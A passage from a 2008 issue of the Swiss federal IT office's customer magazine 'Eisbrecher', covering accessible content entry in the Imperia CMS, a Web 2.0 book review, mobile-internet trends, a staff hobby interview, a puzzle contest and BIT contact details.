Management System (CMS), diese Anforderung
und hat auch im Praxistest bestanden. Ein wirklich
barrierefreies Webangebot erhält man aber erst,
wenn auch die Inhalte im CMS so eingepflegt
werden, dass sie hernach für alle nutzbar sind. So
bleibt Sehbehinderten das schönste Foto unerschlossen, wenn der Online-Redaktor beim
Content-Filling keine aussagekräftige Text-Alternative miterfasst.
In der Bundesverwaltung nehmen nicht weniger
als 700 Personen Aufgaben im Bereich ContentFilling mit dem CMS Imperia wahr. An ihnen liegt
es, im täglichen Gebrauch des CMS einige
wenige, aber umso wichtigere Punkte zu berücksichtigen und damit einen Beitrag zum hürdenfrei
zugänglichen Bundes-Web zu leisten. Worauf es
beim Content-Filling konkret ankommt, haben
die Accessibility-Fachleute des BIT in einem
16-seitigen PDF-Dokument für alle Imperia-Redaktorinnen und -Redaktoren zusammengefasst.
Die nützliche Anleitung mit dem Titel «Barrierefreies Content-Filling mit Imperia», die in Zusammenarbeit mit der Stiftung «Zugang für alle»
entstanden ist, kann in den Imperia-Kundenauftritten (im Hauptmenü unter «Imperia Information Village») abgerufen werden. Das Dokument
steht, nebst vielen weiteren Materialien zum
Thema, auch auf dem Accessibility-Portal im
BIT-Intranet zur Verfügung:
http://intranet.bit.admin.ch/barrierefrei HL
BITS & Bytes
21
› Kurz gelesen
Web 2.0: Das Einsteiger-Handbuch
«Web 2.0» von Tom Alby kann man getrost als
ideale Einsteigerfibel ins Thema Mitmachweb
bezeichnen. 2006 erstmals erschienen, liegt das
Buch seit kurzem in einer dritten, überarbeiteten
Auflage vor. Es richtet sich an alle, die das Web
2.0 verstehen und beim Thema mitreden können
wollen und ist für jeden interessierten Internetnutzer verständlich geschrieben. Tom Alby
beleuchtet in «Web 2.0» Konzepte und Anwendungen stärker als die Technologien (das Buch
enthält keine Codes). Nach der Lektüre des
Buches sind Begriffe wie Blog und Podcast, RSS
und Ajax geläufig, die Leserin oder der Leser
weiss, was «Social Softwares» wie zum Beispiel
Flickr, Xing und Twitter zu bieten haben oder was
sich mit BitTorrent, Mashups oder Skype alles
anstellen lässt. Dabei beschränkt sich der Autor
sehr weitgehend auf die grossen Anwendungen
des Web 2.0. Tiefer geht Alby lediglich beim
Thema Blogs. Nur kurz angeschnitten werden
Begriffe wie die Folksonomy (das gemeinschaftliche Indexieren) oder Geschäftsmodelle wie der
Long Tail (E-Commerce mit Nischenprodukten).
Natürlich fehlt nicht ein Ausblick auf das Web
3.0. Das Besondere am Tom Albys Werk: Man hat
es nicht bloss mit einer weiteren Übersetzung aus
dem Englischen zu tun, sondern das Buch ist im
Original deutsch und auch aus einer vertrauten
(deutschen) Perspektive heraus geschrieben. Im
letzten Kapitel des Buches widmet Alby 45 Seiten
verschiedenen Interviews mit Persönlichkeiten der
Web-2.0-Szene, schwergewichtig aus dem
Weblog-Umfeld. Dem Thema Web 2.0 kann man
sich natürlich von verschiedener
Seite nähern. Alby tut’s wohl
bewusst auf eine eher einfache Art.
Für diejenigen, die von Blogs & Co.
bereits eine sehr klare Vorstellung
haben, ist das Buch zu wenig
spezifisch.
HL
Tom Alby: «Web 2.0», 264 Seiten,
Hanser Verlag, CHF 41.50
› Trendreport
Was geht ab in der Welt des digitalen Lifestyles?
Die «Eisbrecher»-Redaktion hält Ausschau und
verrät aktuelle Trends.
Googeln mit der Handykamera. Das Handy
dürfte den PC als meistgenutzte Schnittstelle zum
Internet bald ablösen. Das ETH-Start-up Kooaba
(www.kooaba.com) hat dazu eine Technologie
entwickelt, mit der man über die integrierte
Kamera nach Infos aus dem Internet suchen
kann. Hierzu fotografiert man das Objekt des
Interesses mit der Handykamera. Erkennt Kooaba
das Objekt auf dem Foto, liefert der Dienst
umgehend die Suchresultate aufs Handy. Bis jetzt
funktioniert Kooaba nur mit aktuellen Kinofilmplakaten. Grundsätzlich kann aber die gesamte
gegenständliche Welt, von Kunstwerken über
Weinetiketten bis hin zu Details einer Sehenswürdigkeit, ins System integriert werden.
Reportage per Handy. Das Multimedia-Handy
ist das zentrale Reporterwerkzeug der nächsten
Journalistengeneration, ist sich die Axel Springer
Akademie in Berlin sicher, denn das Mobiltelefon
ermögliche «crossmediales Story-Telling schon an
der Quelle». Darum hat die bekannte deutsche
Journalistenschule neu das Fach «Handy-Reporting» in den Lehrplan aufgenommen. Die Medienleute von morgen sollen von unterwegs per
Handy alle Medienkanäle mit Video, Audio, Foto
und Text bedienen können. Dies spare wertvolle
Zeit und bringe die Inhalte schneller zu den
Nutzerinnen und Nutzern.
Bürgerfunk 2.0. Während angehende Medienprofis lernen, das Handy für ihre Arbeit einzusetzen, gehen Hinz und Kunz künftig via Mobiltelefon gleich selbst auf Sendung: Dank Sites wie
1000mikes.com kann jetzt jede und jeder seinen
eigenen Radiokanal aufmachen, live und von fast
jedem denkbaren Ort aus. Einfach online registrieren und eine Zürcher Telefonnummer anrufen
– das Handy wird jetzt zum Mikrofon – und schon
ist man «on air»! Gehört werden die Sendungen
per Livestream über die Website, verpasste
Sendungen sind dort im Archiv gespeichert. HL
Tech Quote
«Der Computer ist eine subversive Maschine:
Ein Freund des Volkes und ein Feind der
Tyrannen.»
Wau Holland (1951-2001), deutscher Journalist und Computer-Aktivist, Mitbegründer des
Chaos Computer Clubs
BITS & Bytes
22
SMSInterview
Die ausgefallenen Hobbys der BIT-Mitarbeitenden. Jürg Porro (38), Bereichsleiter Competence Center GEVER, engagiert sich in der
Jungen Wirtschaftskammer. Interview: Marc
Bärtschi.
Was ist die Junge Wirtschaftskammer?
Wir sind ein Non-Profit-Verein, der weltweit Ableger und lokale Organisationen (LOMs) hat und
zwei Ziele verfolgt: Zum einen die Förderung und
Weiterbildung der eigenen Mitglieder und zum
anderen setzen wir uns für die Allgemeinheit ein.
Wir möchten so ein wenig zu einer besseren Welt
beitragen.
Das ist ein hochgestecktes Ziel …
Wir versuchen einfach, mit unseren Möglichkeiten die Welt von morgen lebenswerter zu
machen. So setzen wir uns besonders für Kinder
ein. Unser LOM mit Namen «Pfannenstiel» hat
z.B. 2006 den Benefizanlass «Prominente zeigen
ihr Herz» durchgeführt, wo wir von Prominenten
gestaltete Herzen zugunsten von herzkranken
Kindern versteigerten (siehe Bild, Red.).
Wie muss man sich das Vereinsleben vorstellen?
Etwa einmal im Monat findet ein Anlass statt
Übrigens: Das «Eisbrecher»-Abo ist gratis
Den «Eisbrecher» können Sie kostenlos abonnieren. Senden Sie einfach eine E-Mail mit
Angabe Ihrer Adresse an eisbrecher@bit.
admin.ch oder eine SMS mit Ihrer Adresse an
die Nummer 079 570 05 89.
über ein bestimmtes
Thema. Schwerpunkte sind Wirtschaftsthemen, aber
auch das Allgemeinwissen kommt nicht
zu kurz. Beispiele
von Anlässen sind:
Lach-Seminare, Firmenbesuche oder
ein Referat eines
Wirtschaftsführers. Andere Kammern versuchten
sich auch schon als Weinbauern ...
Wie viele Mitglieder hat die Vereinigung?
Weltweit haben wir über 200 000 aktive Mitglieder. Die internationale Dachorganisation ist
in nationale und regionale Unterorganisationen
aufgeteilt. In der Schweiz haben wir gut 3000
Mitglieder in über 70 LOMs. Jedermann und
jedefrau unter 40 Jahren, welche(r) aktiv soziale
Verantwortung tragen will, kann Aktivmitglied
werden.
Vielen Dank für das Interview.
Junge Wirtschaftskammer Schweiz
www.jci.ch
Ihre Meinung ist uns wichtig
Sie lesen die Kundenzeitung des BIT. Der «Eisbrecher» macht
neue Produkte des BIT bekannt, informiert über laufende
Projekte, berichtet von BIT-Events und widmet sich in jeder
Nummer einem spannenden IT-Thema. Die «Eisbrecher»Redaktion schreibt für Fachleute und User und wüsste gerne,
ob Ihnen Themenmix und Gestaltung zusagen. Sagen Sie
uns, was Ihnen am «Eisbrecher» gefällt und was nicht.
Kritik, Anregungen, Lob und Fragen richten Sie bitte an
[email protected]. Die «Eisbrecher»-Redaktion freut
sich darüber.
BITS & Bytes
23
Mixed Pixels
Das «Eisbrecher»-Team hat wiederum eine Bildercollage für Sie zusammengestellt. Haben Sie den
englischen Begriff aus der Welt der Informationstechnologie erraten? Machen Sie mit und
gewinnen Sie eine 4,5 kg schwere Toblerone! Senden Sie Ihre Antwort per E-Mail an
[email protected] oder per SMS an die Telefonnummer 079 570 05 89.
Teilnahmeschluss ist der 15. August 2008. Bei mehreren richtigen Einsendungen entscheidet das Los. Viel Glück!
Die Gewinnerin der letzten Ausgabe war
Sabina Giannoussios von Präsenz Schweiz. Das
gesuchte Lösungswort lautete: «Startknopf».
Die BIT-Kontakt-Box
BIT-Intranet
http://intranet.bit.admin.ch
Eisbrecher
www.bit.admin.ch/eisbrecher
[email protected]
Eisbrecher-Redaktion,
Kundenkommunikation
Nora Kelemen, Bereichsleiterin Kunden­
kommunikation
Tel.: +41 31 323 38 47
Account Management
[email protected]
Tel.: +41 31 325 20 40
Service Desk BIT
[email protected]
Tel.: +41 31 325 88 88
Supportline CC SAP
[email protected]
Tel.: +41 31 325 80 82
MAC-Aufträge
http://intranet.bit.admin.ch/mac
Tel.: +41 31 325 88 88
IT-Ausbildung des BIT
www.bit.admin.ch/edu
[email protected]
Tel.: +41 31 325 97 52
Natur
Natur
Natur
Kultur
Kultur
Kultur
Kultur
Kultur
Industrie
Industrie
Web 2.0, das so genannte Mitmachweb, ist in aller Munde. Es hat aber nicht nur sehr konkrete Auswirkungen
auf Märkte und Konsumenten, sondern auch eine Geschichte. Mehr darüber auf den Seiten 15 und 16 und eine
Auswahl an Web-2.0-Links im BIT-Intranet.

Documentos relacionados